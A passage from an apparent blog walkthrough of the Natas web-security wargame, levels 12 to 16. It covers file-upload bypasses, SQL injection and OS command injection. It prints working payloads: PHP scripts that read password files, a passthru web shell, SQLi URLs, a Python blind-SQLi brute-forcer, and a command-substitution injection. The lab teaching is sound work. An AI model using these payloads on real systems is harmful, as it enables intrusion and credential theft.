    <span class="k">return</span> <span class="nx">$outText</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">print</span> <span class="nx">base64_encode</span><span class="p">(</span><span class="nx">xor_encrypt_mod</span><span class="p">());</span>
<span class="o">?&gt;</span>
</pre></div>


<p>This results in the code we need to add to the cookie. We do this through the plugin. Refreshing the page returns our password.</p>
<h3>Level 12: File Inclusion Attack</h3>
<p>This challenge starts with a JPG file uploader:
<img alt="" src="http://i.imgur.com/xcSJ5kr.png" /></p>
<p>Inspecting the source code, we see that the first function returns a random string of length 10:</p>
<div class="highlight"><pre><span class="kd">function</span> <span class="nx">genRandomString</span><span class="p">()</span> <span class="p">{</span>
    <span class="nx">$length</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>
    <span class="nx">$characters</span> <span class="o">=</span> <span class="s2">&quot;0123456789abcdefghijklmnopqrstuvwxyz&quot;</span><span class="p">;</span>
    <span class="nx">$string</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="nx">$p</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">$p</span> <span class="o">&lt;</span> <span class="nx">$length</span><span class="p">;</span> <span class="nx">$p</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">$string</span> <span class="p">.</span><span class="o">=</span> <span class="nx">$characters</span><span class="cp">[</span><span class="nx">mt_rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">strlen</span><span class="p">(</span><span class="nv">$characters</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="cp">]</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="nx">$string</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>


<p>This string is used as the name of the uploaded file in the server:</p>
<div class="highlight"><pre><span class="kd">function</span> <span class="nx">makeRandomPath</span><span class="p">(</span><span class="nx">$dir</span><span class="p">,</span> <span class="nx">$ext</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">do</span> <span class="p">{</span>
    <span class="nx">$path</span> <span class="o">=</span> <span class="nx">$dir</span><span class="p">.</span><span class="s2">&quot;/&quot;</span><span class="p">.</span><span class="nx">genRandomString</span><span class="p">().</span><span class="s2">&quot;.&quot;</span><span class="p">.</span><span class="nx">$ext</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">while</span><span class="p">(</span><span class="nx">file_exists</span><span class="p">(</span><span class="nx">$path</span><span class="p">));</span>
    <span class="k">return</span> <span class="nx">$path</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">makeRandomPathFromFilename</span><span class="p">(</span><span class="nx">$dir</span><span class="p">,</span> <span class="nx">$fn</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">$ext</span> <span class="o">=</span> <span class="nx">pathinfo</span><span class="p">(</span><span class="nx">$fn</span><span class="p">,</span> <span class="nx">PATHINFO_EXTENSION</span><span class="p">);</span>
    <span class="k">return</span> <span class="nx">makeRandomPath</span><span class="p">(</span><span class="nx">$dir</span><span class="p">,</span> <span class="nx">$ext</span><span class="p">);</span>
<span class="p">}</span>
</pre></div>


<p>However, this file's extension is given by the browser:</p>
<div class="highlight"><pre><span class="nt">&lt;form</span> <span class="na">enctype=</span><span class="s">&quot;multipart/form-data&quot;</span> <span class="na">action=</span><span class="s">&quot;index.php&quot;</span> <span class="na">method=</span><span class="s">&quot;POST&quot;</span><span class="nt">&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">&quot;hidden&quot;</span> <span class="na">name=</span><span class="s">&quot;MAX_FILE_SIZE&quot;</span> <span class="na">value=</span><span class="s">&quot;1000&quot;</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">&quot;hidden&quot;</span> <span class="na">name=</span><span class="s">&quot;filename&quot;</span> <span class="na">value=</span><span class="s">&quot;&lt;? print genRandomString(); ?&gt;.jpg&quot;</span> <span class="nt">/&gt;</span>
Choose a JPEG to upload (max 1KB):<span class="nt">&lt;br/&gt;</span>
<span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">&quot;uploadedfile&quot;</span> <span class="na">type=</span><span class="s">&quot;file&quot;</span> <span class="nt">/&gt;&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">&quot;submit&quot;</span> <span class="na">value=</span><span class="s">&quot;Upload File&quot;</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;/form&gt;</span>
</pre></div>


<p>Finally, the last function performs the file uploading. Notice that the code does not check whether the file is actually a JPG file:</p>
<div class="highlight"><pre><span class="k">if</span><span class="p">(</span><span class="nx">array_key_exists</span><span class="p">(</span><span class="s2">&quot;filename&quot;</span><span class="p">,</span> <span class="nv">$_POST</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$target_path</span> <span class="o">=</span> <span class="nx">makeRandomPathFromFilename</span><span class="p">(</span><span class="s2">&quot;upload&quot;</span><span class="p">,</span> <span class="nv">$_POST</span><span class="err">[</span><span class="s2">&quot;filename&quot;</span><span class="cp">]</span>);
        if(filesize($_FILES<span class="cp">[</span><span class="s1">&#39;uploadedfile&#39;</span><span class="cp">][</span><span class="s1">&#39;tmp_name&#39;</span><span class="cp">]</span>) &gt; 1000) {
        echo &quot;File is too big&quot;;
    } else {
        if(move_uploaded_file($_FILES<span class="cp">[</span><span class="s1">&#39;uploadedfile&#39;</span><span class="cp">][</span><span class="s1">&#39;tmp_name&#39;</span><span class="cp">]</span>, $target_path)) {
            echo &quot;The file <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">\&quot;$target_path\&quot;</span><span class="nt">&gt;</span>$target_path<span class="nt">&lt;/a&gt;</span> has been uploaded&quot;;
        } else{
            echo &quot;There was an error uploading the file, please try again!&quot;;
        }
    }
} else {
?&gt;
</pre></div>


<h4>Stating the attack:</h4>
<p>We still can upload whatever file we want.</p>
<p>Since the file extension is changed to <em>jpg</em> in the browser side, we have control of this,  we can easly tamper the POST data.</p>
<p>Fist, let's think about the exploit we want to send to the server. Since we know that the server runs PHP, we have several possibilities in this language!</p>
<p>How about the following script which uses the function <a href="http://php.net/manual/en/function.readfile.php">readfile()</a>?</p>
<div class="highlight"><pre><span class="cp">&lt;?php</span>
<span class="nb">readfile</span><span class="p">(</span><span class="s1">&#39;/etc/natas_webpass/natas13&#39;</span><span class="p">);</span>
<span class="cp">?&gt;</span>
</pre></div>


<p>We could also use a <a href="http://php.net/manual/en/function.system.php">system</a> command:</p>
<div class="highlight"><pre><span class="cp">&lt;?php</span>
<span class="nb">system</span><span class="p">(</span><span class="s2">&quot;cat /etc/natas_webpass/natas13&quot;</span><span class="p">);</span>
<span class="cp">?&gt;</span><span class="x"></span>
</pre></div>


<p>Or we could even use <a href="http://php.net/manual/en/function.passthru.php">passthru</a> again:</p>
<div class="highlight"><pre><span class="x"> </span><span class="cp">&lt;?php</span>
 <span class="nb">passthru</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;cmd&#39;</span><span class="p">]);</span>
 <span class="cp">?&gt;</span><span class="x"></span>
</pre></div>


<p>Any of these exploits will work.</p>
<p>Now, let's work our way around the fact that the browser will attempt to change our script extension from <em>php</em> to <em>jpg</em>.</p>
<p>There are several ways to fix this. An easy way is to use a proxy or  extension, such as <a href="http://portswigger.net/burp/">Burp Suite</a> or <a href="http://getfirebug.com/">FireBug</a> to change the filename before it is sent to the server.</p>
<p>We use <em>Burp</em> and the attack is stated in the following steps:</p>
<ol>
<li>
<p>Our exploit script in PHP is uploaded by the server and renamed with a random string and a <em>jpg</em> extension.</p>
</li>
<li>
<p>We intercept the request and change the name of the file back to the name of the script with <em>php</em> extension.</p>
</li>
<li>
<p>We send it to the server, which calls the function <em>MakeRandomPathFromFilename("upload","exploit.php")</em>. This is sent to the function MakeRandomPath('upload', '.php').</p>
</li>
<li>
<p>The server returns the link <em>/upload/randomString.php</em>, which runs our exploit and returns the password.</p>
</li>
</ol>
<h4>Firing up Burp:</h4>
<p>If this is your first time with Burp, <a href="http://portswigger.net/burp/help/suite_gettingstarted.html">this is how you run it</a>. Burp works as an HTTP proxy server, where all  HTTP/S traffic from your browser passes through it. I will show in details how to do this in a *nix system.</p>
<p>First, we lauch Burp:</p>
<div class="highlight"><pre><span class="nv">$ </span>java -jar -Xmx1024m /path/to/burp.jar
</pre></div>


<p>Then we go to the proxy tab and then options and we confirm Burp's Proxy listener is active at <em>127.0.0.1:8080</em>:</p>
<p><img alt="" src="http://i.imgur.com/5xkHB29.png" /></p>
<p>We set the proxy configuration in our system to this address:</p>
<p><img alt="" src="http://i.imgur.com/Au1Gimm.png" /></p>
<p>Back in Burp, we go to <em>Proxy --&gt; Intercept</em> and mark it ON:</p>
<p><img alt="" src="http://i.imgur.com/FAf5Hru.png" /></p>
<p>In the browser, we load the Natas12 page and accept the initial intercepts (forwarding it). We upload out exploit.</p>
<p>Before we forward this request to the server, we open it in Burp and we change the name of the random string in <em>jpg</em> to our <em>php</em> exploit:</p>
<p><img alt="" src="http://i.imgur.com/eywDMOy.png" /></p>
<p>The browser will return the link for the file:</p>
<p><img alt="" src="http://i.imgur.com/SGjbVsy.png" /></p>
<p>Clicking it will reveal the password.</p>
<h3>Level 13: File Inclusion Attack II</h3>
<p>This level looks like the previous one, except by the message:</p>
<blockquote>
<p>For security reasons, we now only accept image files!</p>
</blockquote>
<p>We take a look at the source code and the only difference from the previous level's code is an <em>if</em> clause:</p>
<div class="highlight"><pre><span class="cp">&lt;?</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">&quot;filename&quot;</span><span class="p">,</span> <span class="nv">$_POST</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$target_path</span> <span class="o">=</span> <span class="nx">makeRandomPathFromFilename</span><span class="p">(</span><span class="s2">&quot;upload&quot;</span><span class="p">,</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s2">&quot;filename&quot;</span><span class="p">]);</span>
        <span class="k">if</span><span class="p">(</span><span class="nb">filesize</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;uploadedfile&#39;</span><span class="p">][</span><span class="s1">&#39;tmp_name&#39;</span><span class="p">])</span> <span class="o">&gt;</span> <span class="mi">1000</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">&quot;File is too big&quot;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span> <span class="nb">exif_imagetype</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;uploadedfile&#39;</span><span class="p">][</span><span class="s1">&#39;tmp_name&#39;</span><span class="p">]))</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">&quot;File is not an image&quot;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">if</span><span class="p">(</span><span class="nb">move_uploaded_file</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;uploadedfile&#39;</span><span class="p">][</span><span class="s1">&#39;tmp_name&#39;</span><span class="p">],</span> <span class="nv">$target_path</span><span class="p">))</span> <span class="p">{</span>
            <span class="k">echo</span> <span class="s2">&quot;The file &lt;a href=</span><span class="se">\&quot;</span><span class="si">$target_path</span><span class="se">\&quot;</span><span class="s2">&gt;</span><span class="si">$target_path</span><span class="s2">&lt;/a&gt; has been uploaded&quot;</span><span class="p">;</span>
        <span class="p">}</span> <span class="k">else</span><span class="p">{</span>
            <span class="k">echo</span> <span class="s2">&quot;There was an error uploading the file, please try again!&quot;</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="cp">?&gt;</span><span class="x"></span>
</pre></div>


<p>The clause uses the PHP function  <a href="http://php.net/manual/en/function.exif-imagetype.php">exif_imagetype</a> to check whether the file is  an image type.</p>
<p>The way it works is by checking the first bytes of the image and seeing whether it has an image signature. This signature is known as the <a href="http://en.wikipedia.org/wiki/List_of_file_signatures">magic number</a>. Every binary has one.</p>
<p>It should be obvious that adding the right signature to a file could tamper it to look like another file type.</p>
<h4>Crafting the attack:</h4>
<p>We search for an <a href="http://en.wikipedia.org/wiki/Graphics_Interchange_Format">image magic number</a>. For <em>jpg</em>, it's the hexadeximal <em>ff d8 ff e0</em>. For <em>gif</em>, however, it's really simple: <em>GIF89a</em>.</p>
<p>Let's use it!</p>
<p>Adding this number to our script from the previous level,</p>
<div class="highlight"><pre><span class="nx">GIF89a</span>
<span class="cp">&lt;?php</span>
<span class="nb">readfile</span><span class="p">(</span><span class="s1">&#39;/etc/natas_webpass/natas14&#39;</span><span class="p">);</span>
<span class="cp">?&gt;</span>
</pre></div>


<p>and following the previous steps, leads to the password for the next level.</p>
<h3>Level 14: SQL Injection</h3>
<p>This level starts with a <em>username</em> and <em>password</em> form:</p>
<p><img alt="" src="http://i.imgur.com/qDA3nCP.png" /></p>
<p>Looking at the source code, we see THE connection to  a MySQL server, and a SQL query to look for a record in the database:</p>
<div class="highlight"><pre><span class="cp">&lt;?</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">&quot;username&quot;</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$link</span> <span class="o">=</span> <span class="nb">mysql_connect</span><span class="p">(</span><span class="s1">&#39;localhost&#39;</span><span class="p">,</span> <span class="s1">&#39;natas14&#39;</span><span class="p">,</span> <span class="s1">&#39;&lt;censored&gt;&#39;</span><span class="p">);</span>
    <span class="nb">mysql_select_db</span><span class="p">(</span><span class="s1">&#39;natas14&#39;</span><span class="p">,</span> <span class="nv">$link</span><span class="p">);</span>

    <span class="nv">$query</span> <span class="o">=</span> <span class="s2">&quot;SELECT * from users where username=</span><span class="se">\&quot;</span><span class="s2">&quot;</span><span class="o">.</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">&quot;username&quot;</span><span class="p">]</span><span class="o">.</span><span class="s2">&quot;</span><span class="se">\&quot;</span><span class="s2"> and password=</span><span class="se">\&quot;</span><span class="s2">&quot;</span><span class="o">.</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">&quot;password&quot;</span><span class="p">]</span><span class="o">.</span><span class="s2">&quot;</span><span class="se">\&quot;</span><span class="s2">&quot;</span><span class="p">;</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">&quot;debug&quot;</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">&quot;Executing query: </span><span class="si">$query</span><span class="s2">&lt;br&gt;&quot;</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span><span class="p">(</span><span class="nb">mysql_num_rows</span><span class="p">(</span><span class="nb">mysql_query</span><span class="p">(</span><span class="nv">$query</span><span class="p">,</span> <span class="nv">$link</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">echo</span> <span class="s2">&quot;Successful login! The password for natas15 is &lt;censored&gt;&lt;br&gt;&quot;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">echo</span> <span class="s2">&quot;Access denied!&lt;br&gt;&quot;</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="nb">mysql_close</span><span class="p">(</span><span class="nv">$link</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="cp">?&gt;</span><span class="x"></span>
</pre></div>


<p>If the query returns one or more row, we get a message  with the password for the next level.</p>
<p>The <em>GET</em> in the <em>if</em> clause declares the parameter <em>debug</em> without checking whether this is a safe query input!</p>
<p>Therefore, while a simple GET query such as:</p>
<blockquote>
<p>http://natas14.natas.labs.overthewire.org/index.php?username=admin&amp;password=pass</p>
</blockquote>
<p>returns:</p>
<p><img alt="" src="http://i.imgur.com/mWhSVxh.png" /></p>
<p>A crafted query using <a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection</a> (SQLi) can return whatever we want :).</p>
<h4>Crafting the attack:</h4>
<p>Without any injection, a regular query with words <em>admin</em> and <em>pass</em> would look like this:</p>
<div class="highlight"><pre><span class="n">SELECT</span> <span class="o">*</span> <span class="n">from</span> <span class="n">users</span> <span class="n">where</span> <span class="n">username</span><span class="o">=</span><span class="s">&quot;$(Username)&quot;</span> <span class="n">and</span> <span class="n">password</span><span class="o">=</span><span class="s">&quot;$(Password)&quot;</span>
</pre></div>


<p>We want to inject stuff in the middle to make this query do <em>more things</em>.</p>
<p>In SQLi, we need to take care of the <strong>"</strong> that is automatically added in the end by the server. The simplest way to do this is by including an <strong>always true clause</strong> in the end of everything. This can be represented by:</p>
<div class="highlight"><pre><span class="n">OR</span> <span class="sc">&#39;1&#39;</span><span class="o">=</span><span class="sc">&#39;1&#39;</span>
</pre></div>


<p>So, for example, the following query would not give any error:</p>
<div class="highlight"><pre><span class="n">SELECT</span> <span class="o">*</span> <span class="n">from</span> <span class="n">users</span> <span class="n">where</span> <span class="n">username</span><span class="o">=</span><span class="s">&quot;admin&quot;</span> <span class="n">and</span> <span class="n">password</span><span class="o">=</span><span class="s">&quot;pass&quot;</span> <span class="n">OR</span> <span class="s">&quot;1&quot;</span><span class="o">=</span><span class="s">&quot;1&quot;</span>
</pre></div>


<p>Now, we just need to add stuff before OR!</p>
<p>When we craft the right URL, we keep in mind that whitespace will be translated to <em>%20</em> and <strong>""</strong> will be translated to <em>%22</em>.</p>
<p>Finally, the following URL:</p>
<blockquote>
<p>http://natas14.natas.labs.overthewire.org/index.php?username=admin&amp;password=pass%22%20OR%20%221%22=%221</p>
</blockquote>
<p>reveals the password.</p>
<hr />
<h2>Now the Juice: Scripting Attacks</h2>
<h3>Level 15: SQL Injection II</h3>
<p>This level starts with a  form to check the existence of some username:</p>
<p><img alt="" src="http://i.imgur.com/SO4K5wK.png" /></p>
<p>The source code is almost equal to the previous level, with exception of this part:</p>
<div class="highlight"><pre><span class="cm">/*</span>
<span class="cm">CREATE TABLE `users` (</span>
<span class="cm">  `username` varchar(64) DEFAULT NULL,</span>
<span class="cm">  `password` varchar(64) DEFAULT NULL</span>
<span class="cm">);</span>
<span class="cm">*/</span>
</pre></div>


<p>And the fact that the <em>$query</em>  does not have a password part and it is hygienized now:</p>
<div class="highlight"><pre><span class="k">if</span><span class="p">(</span><span class="nx">array_key_exists</span><span class="p">(</span><span class="s2">&quot;username&quot;</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$link</span> <span class="o">=</span> <span class="nx">mysql_connect</span><span class="p">(</span><span class="s1">&#39;localhost&#39;</span><span class="p">,</span> <span class="s1">&#39;natas15&#39;</span><span class="p">,</span> <span class="s1">&#39;&lt;censored&gt;&#39;</span><span class="p">);</span>
    <span class="nx">mysql_select_db</span><span class="p">(</span><span class="s1">&#39;natas15&#39;</span><span class="p">,</span> <span class="nv">$link</span><span class="p">);</span>
    <span class="nv">$query</span> <span class="o">=</span> <span class="s2">&quot;SELECT * from users where username=</span><span class="se">\&quot;</span><span class="s2">&quot;</span><span class="nx">.</span><span class="nv">$_REQUEST</span><span class="err">[</span><span class="s2">&quot;username&quot;</span><span class="cp">]</span>.&quot;\&quot;&quot;;
    if(array_key_exists(&quot;debug&quot;, $_GET)) {
        echo &quot;Executing query: $query<span class="nt">&lt;br&gt;</span>&quot;;
    }
    $res = mysql_query($query, $link);
    if($res) {
    if(mysql_num_rows($res) &gt; 0) {
        echo &quot;This user exists.<span class="nt">&lt;br&gt;</span>&quot;;
    } else {
        echo &quot;This user doesn&#39;t exist.<span class="nt">&lt;br&gt;</span>&quot;;
    }
    } else {
        echo &quot;Error in query.<span class="nt">&lt;br&gt;</span>&quot;;
    }
    mysql_close($link);
} else {
?&gt;
</pre></div>


<p>We can't just modify the query to return a record because it won't accept <strong>"</strong>.</p>
<p>However, the additional information about the table's proprieties are enough for us! We are going to brute force it!</p>
<h4>Stating the Attack:</h4>
<p>If we check the existence of the users <em>nata15</em> or <em>natas17</em>, we get:</p>
<blockquote>
<p>The user doesn't exist.</p>
</blockquote>
<p>However, if we check for <em>natas16</em> we verify that this user exists! Now we just need a password.</p>
<p>Since checking this <em>natas16</em>  will always return true, we can  inject another clause to the query using the keyword AND:</p>
<div class="highlight"><pre><span class="n">SELECT</span> <span class="o">*</span> <span class="n">from</span> <span class="n">users</span> <span class="n">where</span> <span class="n">username</span><span class="o">=</span><span class="s">&quot;natas16&quot;</span> <span class="n">AND</span> <span class="n">our_exploit</span>
</pre></div>


<p>To pick this additional clause, we look at the <a href="http://www.w3schools.com/sql/sql_wildcards.asp">SQL wildcards and keywords</a></p>
<p>We can use the SQL function <a href="http://www.1keydata.com/sql/sql-substring.html">SUBSTRING</a> and the symbol <strong>%</strong> to compare strings. For example, the following checks whether there is an <strong>a</strong> in the third position of the variable password:</p>
<div class="highlight"><pre><span class="n">AND</span> <span class="n">SUBSTRING</span><span class="p">(</span><span class="n">password</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span> <span class="o">=</span> <span class="n">BINARY</span> <span class="s">&quot;a&quot;</span>
</pre></div>


<p>If SUBSTRING returns false, the entire query becomes false because of the <strong>AND</strong> and we see the message:</p>
<blockquote>
<p>This user doesn’t exist.</p>
</blockquote>
<p>If it returns true, we see</p>
<blockquote>
<p>This user exists.</p>
</blockquote>
<p>Beautiful.</p>
<h4>Crafting the attack:</h4>
<p>We use Python's <a href="http://docs.python-requests.org/en/latest/user/quickstart/">request</a> library to craft our attack:</p>
<div class="highlight"><pre><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">string</span>

<span class="k">def</span> <span class="nf">brute_force_password</span><span class="p">(</span><span class="n">LENGTH</span><span class="p">,</span> <span class="n">AUTH</span><span class="p">,</span> <span class="n">CHARS</span><span class="p">,</span> <span class="n">SQL_URL1</span><span class="p">,</span> <span class="n">SQL_URL2</span><span class="p">,</span> <span class="n">KEYWORD</span><span class="p">):</span>
        <span class="n">password</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">LENGTH</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span>
            <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">CHARS</span><span class="p">)):</span>
                <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span> <span class="p">(</span> <span class="n">SQL_URL1</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="o">+</span> <span class="n">SQL_URL2</span> <span class="o">+</span> <span class="n">CHARS</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="p">),</span> <span class="n">auth</span><span class="o">=</span><span class="n">AUTH</span><span class="p">)</span>
                <span class="k">print</span> <span class="n">r</span><span class="o">.</span><span class="n">url</span>
                <span class="k">if</span> <span class="n">KEYWORD</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
                        <span class="n">password</span> <span class="o">+=</span> <span class="n">CHARS</span><span class="p">[</span><span class="n">j</span><span class="p">]</span>
                        <span class="k">print</span><span class="p">(</span><span class="s">&quot;Password so far: &quot;</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span>
                        <span class="k">break</span>
        <span class="k">return</span> <span class="n">password</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">&#39;__main__&#39;</span><span class="p">:</span>
        <span class="c"># authorization: login and password</span>
        <span class="n">AUTH</span> <span class="o">=</span> <span class="p">(</span><span class="s">&#39;natas15&#39;</span><span class="p">,</span> <span class="s">&#39;*******************************&#39;</span><span class="p">)</span>

        <span class="c"># BASE64 password and 32 bytes</span>
        <span class="n">CHARS</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="o">.</span><span class="n">digits</span>
        <span class="n">LENGTH</span> <span class="o">=</span> <span class="mi">32</span>

        <span class="c"># crafted url option 1</span>
        <span class="n">SQL_URL1</span> <span class="o">=</span> <span class="s">&#39;http://natas15.natas.labs.overthewire.org?username=natas16&quot; AND SUBSTRING(password,&#39;</span>
        <span class="n">SQL_URL2</span> <span class="o">=</span> <span class="s">&#39;,1) LIKE BINARY &quot;&#39;</span>
        <span class="n">KEYWORD</span> <span class="o">=</span> <span class="s">&#39;exists&#39;</span>

        <span class="k">print</span><span class="p">(</span><span class="n">brute_force_password</span><span class="p">(</span><span class="n">LENGTH</span><span class="p">,</span> <span class="n">AUTH</span><span class="p">,</span> <span class="n">CHARS</span><span class="p">,</span> <span class="n">SQL_URL1</span><span class="p">,</span> <span class="n">SQL_URL2</span><span class="p">,</span> <span class="n">KEYWORD</span><span class="p">))</span>
</pre></div>


<p>After around 10 minutes we have our password.</p>
<h3>Level 16: OS Command Injection III</h3>
<p>This level starts with a searching form:</p>
<p><img alt="" src="http://i.imgur.com/kMHZzZ9.png" /></p>
<p>The source code is similar to the 9th and 10th levels:</p>
<div class="highlight"><pre><span class="nt">&lt;pre&gt;</span>
<span class="err">&lt;</span>?
$key = &quot;&quot;;
if(array_key_exists(&quot;needle&quot;, $_REQUEST)) {
    $key = $_REQUEST<span class="cp">[</span><span class="s2">&quot;needle&quot;</span><span class="cp">]</span>;
}
if($key != &quot;&quot;) {
    if(preg_match(&#39;/<span class="cp">[</span><span class="p">;</span><span class="o">|&amp;</span><span class="err">`</span><span class="o">\</span><span class="s1">&#39;&quot;]/&#39;</span><span class="p">,</span><span class="nv">$key</span><span class="p">))</span> <span class="p">{</span>
        <span class="nx">print</span> <span class="s2">&quot;Input contains an illegal character!&quot;</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="nx">passthru</span><span class="p">(</span><span class="s2">&quot;grep -i </span><span class="se">\&quot;</span><span class="s2">$key</span><span class="se">\&quot;</span><span class="s2"> dictionary.txt&quot;</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="o">?&gt;</span>
<span class="o">&lt;/</span><span class="nx">pre</span><span class="o">&gt;</span>
</pre></div>


<p>The difference now is that the code is being hygienized for <strong>`</strong>, <strong>"</strong>, and <strong>'</strong>. The old attack adding <strong>""</strong> won't work.</p>
<p>We need to figure out what else we can use.</p>
<p>Bash has a feature called <a href="http://www.tldp.org/LDP/abs/html/commandsub.html">command substitution</a>, where  commands can be passed with:</p>
<div class="highlight"><pre><span class="err">$</span><span class="p">(</span><span class="n">command</span><span class="p">)</span>
</pre></div>


<p>For example, the date command:</p>
<div class="highlight"><pre><span class="nv">$ MY_CMD</span><span class="o">=</span><span class="s2">&quot;$(date)&quot;</span>
<span class="nv">$ </span><span class="nb">echo</span> <span class="nv">$MY_CMD</span>
Wed Oct 14 20:23:41 EDT 2014
</pre></div>


<h4>Stating the attack:</h4>
<p>We are going to use command substitution to craft a command in the variable <em>$key</em>, which lies inside:</p>
<div class="highlight"><pre><span class="n">grep</span> <span class="o">-</span><span class="n">i</span> <span class="err">\</span><span class="s">&quot;$key</span><span class="se">\&quot;</span><span class="s"> dictionary.txt</span>
</pre></div>


<p>We are going to add another grep! Let's call it <em>grep II</em>.</p>
<p>This time we will give it the flag <code>-E</code> to allow the use of regular expressions.</p>
<p>So, for example, we can use the <em>regex wildcard</em> <strong>.*</strong> to search for a char (say <em>a</em>) in the password string:</p>
<div class="highlight"><pre><span class="err">$</span><span class="p">(</span><span class="n">grep</span> <span class="o">-</span><span class="n">E</span> <span class="o">^</span><span class="n">a</span><span class="p">.</span><span class="o">*</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">natas_webpass</span><span class="o">/</span><span class="n">natas17</span><span class="p">)</span><span class="n">banana</span>
</pre></div>


<p>If <em>grep II</em> finds a match, it returns the char. In the other case, it won't return any output.</p>
<p>Once <em>grep II</em> is over, <em>grep I</em> will do the regular search for the pattern we passed (banana).</p>
<p>If <em>grep II</em> didn't return anything, banana will be banana. If <em>grep II</em> returns a match, banana will have this extra string added to it (abanana).</p>
<p>Now we can extend this logic to each char in the password string.</p>
<h4>Crafting the attack:</h4>
<p>By inspection, we see that the crafted URL to check, say, <em>a</em> in the first char, should look like this:</p>
<blockquote>
<p>http://natas16.natas.labs.overthewire.org/?needle=$(grep%20-E%20^a.*%20/etc/natas_webpass/natas17)banana&amp;submit=Search</p>
</blockquote>
<p>This allows us to write the following script:</p>
<div class="highlight"><pre><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">string</span>

<span class="k">def</span> <span class="nf">brute_force_password</span><span class="p">(</span><span class="n">LENGTH</span><span class="p">,</span> <span class="n">AUTH</span><span class="p">,</span> <span class="n">CHARS</span><span class="p">,</span> <span class="n">URL1</span><span class="p">,</span> <span class="n">URL2</span><span class="p">):</span>
        <span class="n">password</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
